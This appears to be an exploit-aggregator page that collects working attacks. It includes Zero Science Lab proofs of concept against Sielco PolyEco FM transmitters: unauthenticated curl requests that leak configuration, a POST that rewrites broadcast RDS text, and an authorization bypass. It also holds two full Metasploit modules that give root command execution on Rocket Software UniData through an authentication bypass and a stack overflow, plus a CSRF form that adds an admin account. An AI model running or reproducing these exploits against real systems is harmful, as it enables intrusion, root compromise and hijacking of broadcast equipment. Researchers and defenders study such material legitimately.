Latest exploits :: CodePwn

<pre><code> Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5766 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php 26.01.2023 -- $ curl -s http://RADIOFM/factory.ssi $ curl -s http://RADIOFM/rds.ssi $ curl -s http://RADIOFM/ip.ssi $ curl -s http://RADIOFM/alarm.ssi $ curl -s http://RADIOFM/i2s.ssi $ curl -s http://RADIOFM/time.ssi $ curl -s http://RADIOFM/fft.ssi $ curl -s http://RADIOFM/info.ssi $ curl -s http://RADIOFM/status.ssi $ curl -s http://RADIOFM/statusx.ssi $ curl -s http://RADIOFM/audio.ssi $ curl -s http://RADIOFM/smtp.ssi $ curl -s http://RADIOFM/rf.ssi $ curl -s http://RADIOFM/rfa.ssi $ curl -s http://RADIOFM/ping.ssi $ curl -s http://RADIOFM/lan.ssi $ curl -s http://RADIOFM/kappa.ssi $ curl -s http://RADIOFM/dbrt.ssi $ curl -s http://RADIOFM/audiom.ssi $ curl -s http://RADIOFM/log.ssi </code></pre>

<pre><code> Sielco PolyEco Digital FM Transmitter 2.0.6 Radio Data System POST Manipulation Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions and manipulate the RDS text display. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5767 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php 26.01.2023 -- POST /protect/rds.htm HTTP/1.1 Host: RADIOFM rds_inta=1 rds_intb=0 rds_pi=381 rds_ps=ZSL rds_rta=www.zeroscience.mk rds_rtb rds_rtt=0 rds_tp=0 rds_tp=1 rds_ta=0 rds_ms=0 rds_pty=4 rds_ptyn= rds_ecc=00 rds_ct=0 rds_level=90 rds_psd=0 rds_psd1 rds_pst1=0 rds_psd5 rds_pst5=0 rds_psd2 rds_pst2=0 rds_psd6 rds_pst6=0 rds_psd3 rds_pst3=0 rds_psd7 rds_pst7=0 rds_psd4 rds_pst4=0 rds_psd8 rds_pst8=0 rds_di_pty=0 rds_di_cmp=0 rds_di_cmp=1 rds_di_st=0 rds_di_art=0 rds_di_art=1 a0=90 a1=9 a2=26 a3=115 a4=0 a5=0 a6=0 a7=0 a8=0 a9=0 a10=0 a11=0 a12=0 a13=0 a14=0 a15=0 a16=0 a17=0 a18=0 a19=0 a20=0 a21=0 a22=0 a23=0 a24=0 </code></pre>

<pre><code> Sielco PolyEco Digital FM Transmitter 2.0.6 Authorization Bypass Factory Reset Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5768 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php 26.01.2023 -- index.htm: ---------- 54: function dologin() { 55: var hash = hex_md5($('#password').val() + id); 56: $.get('/login.cgi', { 57: user: $('#user').val(), 58: password: hash, 59: id: id 60: }).done(function (data) { 61: var dati = $.parseXML(data); 62: id = $(dati).find('id').text(); 63: user = $(dati).find('u').text(); 64: if (id == 0) 65: window.location.href = '/index.htm'; 66: else { 67: scriviCookie('polyeco', id, 180); 68: if (user >= 3) 69: window.location.href = '/protect/factory.htm'; 70: else 71: window.location.href = '/protect/index.htm'; 72: } 73: }); 74: } The function 'dologin()' in index.htm is called when a user submits a login form. It starts by calculating a hash of the user-entered password and a variable 'id' using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi' endpoint with the user's entered username, the calculated password hash and the 'id' variable as parameters. If the request is successful, the function parses the XML data returned from the server, extracting the values of the 'id' and 'u' elements. Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the value of 'id' and expires after 180 days. After that it checks the value of the 'user' variable, if it's greater than or equal to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side JavaScript to always set the 'user' variable to a high value (4), or by tampering with the data sent to the server during the login process to change the value of the 'user' variable. It also works if the server's response variable 'user' is modified. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager include Msf::Exploit::Remote::Unirpc prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Rocket Software Unidata udadmin_server Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the Linux version of udadmin_server, which is an RPC service that comes with the Rocket Software UniData server. This affects versions of UniData prior to 8.2.4 build 3003. This service typically runs as root. It accepts a username of ":local:" and a password in the form of "<username>:<uid>:<gid>", where username and uid must be a valid account, but gid can be anything except 0. This exploit takes advantage of this login account to authenticate as a chosen user and run an arbitrary command (using the built-in OsCommand message). }, 'License' => MSF_LICENSE, 'Author' => [ 'Ron Bowes', # Discovery, PoC, module ], 'References' => [ [ 'URL', 'https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed' ], [ 'CVE', '2023-28503' ], ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 31438, 'PrependFork' => true }, 'Privileged' => true, 'DisclosureDate' => '2023-03-30', 'Notes' => { 'SideEffects' => [], 'Reliability' => [REPEATABLE_SESSION], 'Stability' => [CRASH_SAFE] } ) ) register_options( [ OptString.new('UNIRPC_USERNAME', [ true, 'Linux username to authenticate with (must match the uid)', 'root']), OptInt.new('UNIRPC_UID', [ true, 'Linux uid to authenticate with (must correspond to the username)', 0]), OptInt.new('UNIRPC_GID', [ true, 'gid to authenticate with (must not be 0, does not need to correspond to the username)', 1000]), ] ) register_advanced_options( [ OptString.new('UNIRPC_ENDPOINT', [ true, 'The UniRPC service to request', 'udadmin']), ] ) end # We can detect UniRPC by performing a version check, but the version number # didn't increment in the patch (only the build number did, which AFAICT we # can't access), so just do a sanity check def check version = unirpc_get_version vprint_status("Detected UniRPC version #{version} is running") Exploit::CheckCode::Detected rescue UniRPCCommunicationError => e return CheckCode::Safe("Could not communicate with the UniRPC server: #{e}") rescue UniRPCUnexpectedResponseError => e return CheckCode::Safe("UniRPC server returned something unexpected: #{e}") end def execute_command(cmd, _opts = {}) vprint_status('Sending OsCommand request') sock.put(build_unirpc_message(args: [ # Message type { type: :integer, value: UNIRPC_MESSAGE_OSCOMMAND }, { type: :string, value: cmd }, ])) end def exploit # Sanity check if datastore['UNIRPC_GID'] == 0 fail_with(Failure::BadConfig, 'UNIRPC_GID cannot be 0') end # Connect to the service connect # Connect to the RPC service (probably "udadmin") vprint_status("Connecting to UniRPC endpoint #{datastore['UNIRPC_ENDPOINT']}") sock.put(build_unirpc_message(args: [ # Service name { type: :string, value: datastore['UNIRPC_ENDPOINT'] }, # "Secure" flag - this must be non-zero if the server is started in # "secure" mode (-s) { type: :integer, value: 1 }, ])) # This will throw an error if the login fails, otherwise we can discard the # result recv_unirpc_message(sock, first_result_is_status: true) # Prepare the authentication bypass username = ':local:' password = "#{datastore['UNIRPC_USERNAME']}:#{datastore['UNIRPC_UID']}:#{datastore['UNIRPC_GID']}" vprint_status("Authenticating to RPC service as #{username} / #{password}") # Send the authentication message sock.put(build_unirpc_message(args: [ # Message type { type: :integer, value: UNIRPC_MESSAGE_LOGIN }, # Username # ":local:" is a special value that skips login { type: :string, value: username }, # Password (encoded by making each byte negative) # I think if username is :local:, this is username:uid:gid (gid can't be 0) { type: :string, value: password.bytes.map { |b| (0x0FF & (~b)).chr }.join }, ])) # Once again, we only care if this fails - if the status is an error recv_unirpc_message(sock, first_result_is_status: true) # Run the command(s) case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end rescue UniRPCCommunicationError => e fail_with(Failure::Unreachable, "Could not communicate with the UniRPC server: #{e}") rescue UniRPCUnexpectedResponseError => e fail_with(Failure::UnexpectedReply, "UniRPC server returned something unexpected: #{e}") end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager include Msf::Exploit::Remote::Unirpc prepend Msf::Exploit::Remote::AutoCheck OFFSETS = { '8.2.4' => { # The amount of padding required to overwrite the return addr 'offset' => 0x2b8, # This returns to "mov rdi, rsp / call system", which means the # remainder of what's on the stack will be passed to system() 'return_address' => 0x412e25 } } def initialize(info = {}) super( update_info( info, 'Name' => 'Rocket Software Unidata udadmin_server Stack Buffer Overflow in Password', 'Description' => %q{ This modlue exploits an authentication bypass vulnerability in the Linux version of udadmin_server, which is an RPC service that comes with the Rocket Software UniData server, which runs as root. This vulnerability affects UniData versions 8.2.4 build 3003 and earlier (for Linux), but this module specifically targets UniData version 8.2.4 build 3001. Other versions will crash the forked process, but will not otherwise affect the RPC server. The username and password fields are copied to a stack-based buffer using a function that's equivalent to strcpy() (ie, has no bounds checking). Additionally, the password field is encoded in such a way that we can include NUL bytes. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ron Bowes', # Discovery, PoC, module ], 'References' => [ [ 'URL', 'https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed' ], [ 'CVE', '2023-28502' ], ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD], 'DefaultOptions' => { 'RPORT' => 31438, 'PrependFork' => true }, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd } ], [ 'Linux Dropper', { # Used for auto-selection 'Version' => '8.2.4', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper } ] ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => '2023-03-30', 'Notes' => { 'SideEffects' => [], 'Reliability' => [REPEATABLE_SESSION], 'Stability' => [CRASH_SERVICE_RESTARTS] # The forked process can crash } ) ) register_options( [ OptBool.new('EXIT_CLEANLY', [ true, 'If set, tries to kill the parent process with SIGTERM before it crashes', true]), OptEnum.new('UNIDATA_VERSION', [true, 'The version of UniData target. Automatic detection is the default.', 'auto', ['auto', '8.2.4'] ]), ] ) register_advanced_options( [ OptString.new('UNIRPC_ENDPOINT', [ true, 'The UniRPC service to request', 'udadmin']), ] ) end # We can detect UniRPC by performing a version check, but the version number # didn't increment in the patch (only the build number did, which AFAICT we # can't access), so just do a sanity check def check @version = unirpc_get_version vprint_status("Detected UniRPC version #{@version} is running") Exploit::CheckCode::Detected rescue UniRPCCommunicationError => e return CheckCode::Safe("Could not communicate with the UniRPC server: #{e}") rescue UniRPCUnexpectedResponseError => e return CheckCode::Safe("UniRPC server returned something unexpected: #{e}") end def execute_command(cmd, _opts = {}) # Connect to the service and authenticate before running the command stager connect # Connect to the RPC service (probably "udadmin") vprint_status("Connecting to UniRPC endpoint #{datastore['UNIRPC_ENDPOINT']}") sock.put(build_unirpc_message(args: [ # Service name { type: :string, value: datastore['UNIRPC_ENDPOINT'] }, # "Secure" flag - this must be non-zero if the server is started in # "secure" mode (-s) { type: :integer, value: 1 }, ])) recv_unirpc_message(sock, first_result_is_status: true) # Pick a random username username = rand_text_alpha(6..20) # Start the password with random junk that writes to the stack password = rand_text_alpha(@offsets['offset']) # Append the return address password += [@offsets['return_address']].pack('Q') # Attempt to cleanly kill the parent process if we can (otherwise it # crashes) # # Because of how the payload goes onto the stack immediately after the # return address, we can't return into an `exit` call - all the parent # process can do is crash (which is logged). # # We CAN, however, prepend a command to cleanly kill the parent PID, making # it look like a standard exit (not logged). if datastore['EXIT_CLEANLY'] password += 'kill -TERM $PPID & ' end # End with the command, which will be passed to system() password += cmd # Check if the payload includes the `\xff` character, which will terminate # the string and break the module. This shouldn't ever appear in the actual # payload, which is base64-encoded, but this will catch a future return # address that would break the payload if password.include?("\xff") fail_with(Failure::BadConfig, 'Payload contains a 0xFF character, which will fail') end vprint_status("Authenticating to RPC service as #{username} with a stack-overflowing password") sock.put(build_unirpc_message(args: [ # Message type { type: :integer, value: UNIRPC_MESSAGE_LOGIN }, # Username { type: :string, value: username }, # Password (encoded by making each byte negative) { type: :string, value: password.bytes.map { |b| (0x0FF & (~b)).chr }.join }, ])) print_status('Payload sent') end def exploit if datastore['UNIDATA_VERSION'] == 'auto' if @version.nil? vprint_status('Requesting the version number for automatic targeting...') @version = unirpc_get_version else vprint_status("Using the version number from earlier for targeting: #{@version}") end else @version = datastore['UNIDATA_VERSION'] vprint_status("Using the version number from UNIDATA_VERSION for targeting: #{@version}") end @offsets = OFFSETS[@version] if @offsets.nil? fail_with(Failure::NoTarget, "No matching target for version #{@version}") end # Run the command(s) case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end rescue UniRPCCommunicationError => e fail_with(Failure::Unreachable, "Could not communicate with the UniRPC server: #{e}") rescue UniRPCUnexpectedResponseError => e fail_with(Failure::UnexpectedReply, "UniRPC server returned something unexpected: #{e}") end end </code></pre>

<pre><code> CSRF Add Admin: --------------- <html> <body> <form action="http://radiolink/protect/users_rx.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="Reader" /> <input type="hidden" name="pwd1" value="123456" /> <input type="hidden" name="pwd1bis" value="123456" /> <input type="hidden" name="auth1" value="2" /> <input type="hidden" name="user2" value="" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="0" /> <input type="hidden" name="user3" value="" /> <input type="hidden" name="pwd3" value="" /> <input type="hidden" name="pwd3bis" value="" /> <input type="hidden" name="auth3" value="0" /> <input type="submit" value="Adminize Me!" /> </form> </body> </html> </code></pre>